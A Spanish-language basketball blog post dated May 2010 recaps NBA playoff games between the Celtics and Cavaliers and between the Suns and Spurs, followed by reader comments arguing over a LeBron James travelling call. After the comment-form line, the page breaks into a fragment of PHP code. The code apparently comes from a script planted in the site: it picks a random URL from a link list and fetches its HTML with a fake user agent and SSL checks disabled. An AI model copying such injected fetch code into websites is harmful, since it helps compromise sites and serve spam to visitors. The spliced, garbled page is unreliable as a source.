Playoffs 03/05/2010: Celebración y remojón

04 de May de 2010 por TheDeerHunter

Levantaba LeBron James el “Maurice-Podoloff” ante el delirio de los suyos. Hay quienes consideran este tipo de festejos previos a la competición como malos presagios y los Cavs no se están jugando precísamente una pachanga de solteros contra casados. Con todo, no había mucha gente en Cleveland que en ese momento sintiera otra cosa que optimismo y orgullo hacia su joven paladín. Pero la palabra “orgullo” está tatuada con fuego en el corazón del que viste la camiseta del trévol y lo último que soporta un Celtic es lo de ser comparsa en ninguna verbena. Si hay algo que se considera como verdad suprema en esta liga es que enfrentarte a ellos nunca suele ser motivo de celebración.

Los Celtics plantearon un choque a cara de perro. De esos en los que cada pequeña acción cuenta, en los que cada canasta es un parto y cada error se paga. Uno de esos partidos en los que suda tinta hasta el árbitro y cada punto que te saca el rival es un puerto de montaña. Anoche los de Cleveland se encontraron enfrente, por primera vez esta temporada, a los Celtics campeones que todos recordamos.

Lo pasó mal LeBron en cuanto soltó el trofeo de la mano. Los Celtics le cedieron el tiro exterior, desde donde no estuvo fino, y le acosaron por dentro alrededor todo lo que pudieron. Peor lo pasó el resto, superados bajo tableros y anulados en ataque. Sólo Jamison fue capaz de alcanzar dobles dígitos, junto a Hickson que fue capaz de maquillar al final. Por los Celtics, estuvieron inmensos prácticamente todos. Desde su “big four” con Ray Allen y Garnett a la cabeza más una dirección de Rondo de escándalo, hasta el más que digno partido de Kedrick Perkins y la sobresaliente actuación de Rasheed, tan cuestionado en la primera ronda. No se puede ignorar que los Celtics han sido superiores en el global de estos dos partidos y ahora la serie viaja a Boston, no precisamente de turismo.

Después, en Phoenix, los Suns impusieron galones. Precioso duelo de “big threes”… pero Nash fue superior a Parker, Richardson a Ginobili y Stoudemire a Duncan… y a partir de ahí no hay mucho más que contar. La intendencia de Phoenix también tuvo un mejor rendimiento global que la de Spurs, donde ni George Hill ni Jefferson lograron aportar apenas nada positivo como sí hicieron en primera ronda. Así los Suns fueron superiores prácticamente en todo y están a un partido menos de culminar su venganza personal.

PREMIOS

MVP: Va de bases. El “tocado” Steve Nash les endosó anoche 33 puntos y 10 asistencias a los Spurs y Rajon Rondo consiguió tan solo 13 puntos pero repartió 19 asistencias en la victoria céltica frente los Cavs. Bases con mayúscula.

Rookie: En momentos de máxima exigencia no hay tiempos para experimentos con rookie. La presencia de DaJuan Blair fue testimonial.

Sorpresa: Nos quéjabamos en el primer partido de la pobre aportación de Rasheed Wallace y anoche respondió con 17 puntos en 18 minutos.

Decepción: El outsider de los Spurs, George Hill, estuvo errático en el tiro y bastante mal defensivamente. Richard Jefferson tampoco cuajó el partido de su vida, que digamos.

Esfuerzo en vano: Lebron & Jamison por un lado y Ginobili & Duncan & Parker por el otro. Lo malo es que el resto de sus respectivos compañeros les dejaron demasiado solos.

Y MAÑANA…

Segundo partido de la serie Lakers – Jazz que ha de servir para disipar dudas. ¿Fueron sobrados los Lakers? ¿Tuvieron los Jazz la victoria a tiro realmente en algún momento? Y en el Este primer partido del Magic-Hawks, con favoritismo absoluto para Howard y compañía. ¿Habrán tomado nota en Atlanta de cómo parar al mejor pívot de la liga?

Comenta

19 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Sigo pensando que pasarán los Cavs, pero nunca esperé una victoria de los Celtics tan abultada.

      Citar

  2. sayim dice:
    #2

    Para mi la paliza ayer de los Celtics a los Cavs es de las que dejan huella. Fueron mejores todo el partido (casi los dos partidos) y ganaron muy fácil a pesar del arbitraje (de escándalo para mi, con más del doble de tiros libres para los locales y 31 a 16 en faltas). Buen partido en ataque de todos los verdes y haciendo sufrir mucho a los Cavs en defensa.

    No voy a ser yo el que dude del equipo con el mejor record de la liga, pero me parece aventurado darlos como ganadores…. Si acaso yo veo la serie 60-40 favorable a los verdes. Nunca se puede subestimar a un equipo campeón y en esta serie solo hay uno. El otro lleva años encontrando excusas para sus eliminaciones en PO…

    Un saludo

      Citar

  3. pcerezo dice:
    #3

    Los Celtics han conseguido (gracias a los ajustes de un sensacional entrenador) que Lebron tire de lejos y todos sabemos que cuanto más lejos tire menos opciones tienen los Cavs de ganar. No le tengo confianza a Mike Brown y por ahí creo que se les pueden escapar opciones ya que creo que van a tener que ajustar muchas cosas. Lo de Shaq da lástima, de veras. Verle jugar ya es una pena ayer le dieron un balón bajo el aro y no fue capaz de saltar para matarlo.
    Que Jamison, despues de cuatro meses en el equipo, no tenga jugadas propias, un tío que ha metido en su carrera 20 puntos por partido es de traca.

    Por cierto, que capullo es Rasheed Wallace, ayer volvio a ser Etiqueta Negra. Lástima de su actitud a lo largo de su carrera, tenía calidad de sobra para haber sido un jugador muy desequilibrante, más todavía de lo que lo ha sido.

    Simplemente lo ha vuelto a hacer una vez más. Nash no deja de sorprenderme con más de 35 primaveras mete 33-10 a los Spurs, simplemente a sus piés y lo que quiera.

      Citar

  4. rojorob dice:
    #4

    Eh, Pablo. Así que te gusta “El hombre que pudo reinar”, eh?. Si es que te encuentro por todos los sitios… Por cierto, y para hacer comentario baloncestístico, que LeBron siga ganando MVPs , que va a ser el mejor jugador de la historia aunque sin un solo anillo.

      Citar

  5. pcerezo dice:
    #5

    Joder rojorob, si es que la red es tan grande que al fina es un pañuelo. Me encanta esa película. De todas formas es complicado que una película con Connery y Caine sea mala.

      Citar

  6. MagicJohnson32 dice:
    #6

    Connery y Caine (y el siempre infravalorado pero enorme Christopher Plummer) dirigidos por John Houston. Casi nada.

    Bueno, el toque de atención a los Cavs ha sido curioso. Y lógicamente los Celtics tienen equipo para hacer la serie muy, muy larga. Lo que parece es que Cleveland necesitará a LeBron no sólo en plan MVP sino también en plan líder.

      Citar

  7. kantonyo dice:
    #7

    Lo has bordado Deer. La intensidad de Celtics desde el primer minuto ha sido clave.

    Yo creo que Garnett no estuvo del todo bien, sobre todo en los momentos decisivos en ataque, luego al final maquilló un poco su actuación. No se parece a sí mismo en nada, una pena. Pero si no le pierden las formas puede llegar a ser muy importante en esta eliminatoria. Hubo un momento en que Rivers le colocó defendiendo a Lebron y no lo hizo mal.

    Parece que si Rasheed juega como ayer, va a merecer la pena la mala temporada que ha realizado. Le dió mucha versatilidad al ataque de Celtics, encestando varios triples que hicieron que Cavs abrieran bastante la defensa.

    En el otro partido, Nash me ha vuelto a sorprender con 36 años, que bueno es, que bien sabe jugar, cada parece más joven. Posiblemente sea el jugador más inteligente que ha pasado por la NBA en la última decada. Si de Howard dudo de sus musculos, de Nash dudo de su cerebro, este se ha metido algo, parece que esta jugando con los ojos puestos en el videomarcador.

      Citar

  8. Rafa dice:
    #8

    Por cierto, de escándalo los pasos de ayer de Lebron:

    http://www.youtube.com/watch?v=Dm0k2rqEeJQ

    Ciertamente el arbitraje no fue de lo mejor…

      Citar

  9. TheDeerHunter dice:
    #9

    no seré yo quien defienda a LeBron y sus malos vicios de los pasos… pero creo que son los pasos más sutiles que le he visto hacer en la vida

    si el arbitraje fue malo no sería particularmente por esos pasos, que son bastante complicados de ver (aunque Rivers no tuvo dudas) De lo que estoy seguro es que en Boston se va a repartir lo que no está escrito y los árbitros mirarán para otro lado como hacen siempre.

      Citar

  10. sayim dice:
    #10

    yo vi el partido de ayer y mas alla de los pasos (que lo son, como también lo son otras veces) tuve la sensación de que no se pitaban los contactos igual en ambas zonas. Y eso que no soy sospechoso de ser de ninguno de los dos equipos…

      Citar

  11. sergio dice:
    #11

    Si toca con los dos pies al mismo tiempo se toma como un paso… eso lo he hecho yo muchas veces en partidos en competiciones y tampoco me los han pitado.

    Vi el partido entero y no me parecio en absoluto un mal arbitraje. Creo que Doc Rivers esta planteando un partido muy fisico para el juego interior, cometiendo faltas a O’neal, Jamison, James, Varejao y Hickson siempre que entren con comodidad al aro para aprovechar el bajo porcentaje del equipo en tiros libres. A los exteriores los deja tirar con relativa comodidad, dejando incluso que se precipiten en las penetraciones (salvo las de James).

    En ataque intentan mover el balon y repartir todo lo posible los lanzamientos para involucrar a cualquier jugador que pueda tener una buena racha, que en los Celtics son 4 o 5 hombres: Allen, Rondo, Pierce, Garnett o Sheed. El problema de los Cavs es que intentan hacer su juego de siempre sin minimizar el de los verdes y sin que su entrenador aporte soluciones a los problemas que se le van planteando. No nos engañemos, los Playoffs son el momento de los entrenadores, cuando pueden preparar concienzudamente las series y aportar al equipo un factor determinante.

    En cuanto a que Jamison no tenga jugadas preparadas… tampoco me extraña. Ademas, es un jugador que puede aportar muchisimo sin absorber juego, solo a base de ganar la linea, coger rebotes y abrir huecos para conseguir sus propios tiros. Es de los jugadores mas versatiles e inteligentes de la Liga… aunque eso tambien lo pensaba de Jefferson y mira.. jaja

      Citar

  12. sergio dice:
    #12

    Ok… si son pasos de LeBron, que da dos antes del salto final… Es que me he puesto a visionar el video de nuevo porque me habia dejado muy pillado.

    Mas descarados son los que hace en cada contragolpe. Ayer cogio un balon por encima de la cabeza a unos dos metros del centro del campo y no boto ni una vez el balon hasta machacar el aro. Pero no encuentro el video…

      Citar

  13. Txusma dice:
    #13

    Pues yo no veo pasos aunq ya reconozco que tengo problemas con este tema. Los de salida soy incapaz de controlarlos.
    A ver, coge el balón, pone el pie derecho en el suelo y cae sobre los dos pies a la vez, salta y deja el balón. Donde están los pasos?

      Citar

  14. sergio dice:
    #14

    Ya han despedido a Del Negro…

      Citar

  15. kantonyo dice:
    #15

    No decian que este año habian cambiado la regla de los pasos de salida??? Yo me he dado cuenta que ya los hacen demasiado jugadores.

    Respecto a esta jugada, si como parece LeBron da un paso, cae sobre los dos y salta tirando a canasta, yo tampoco veo pasos. Pq sino me equivoco cuando caes con los dos pies, tienes dos opciones, o pasar o tirar a canasta, y es lo que hizo.

      Citar

  16. troco dice:
    #16

    Son pasos,porque caer con los dos pies se contaviliza como dos pasos y anteriormente da uno. Sergio si a ti no te los pitan esta mal pitado. En la NBA no hay pasos de salida.

      Citar

  17. MagicJohnson32 dice:
    #17

    La NBA cambió este verano la norma de los pasos de salida. Hasta entonces el jugador sólo podía dar un paso (juas juas) antes de parar o soltar el balón (bote, pase o tiro). Ahora el jugador puede dar dos pasos.

    Eso, sobre el papel. La aplicación de la norma es la misma.

      Citar

  18. Txusma dice:
    #18

    Tendré q repasarme la norma pero yo juraría que caer sobre los 2 pies a la vez se cuenta como un solo paso. Si luego mueves uno de los 2, malo pero si saltas y pasas o tiras no hay infracción.

      Citar

  19. MagicJohnson32 dice:
    #19

    La norma es así, Txus, la acción de LeBron es legal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>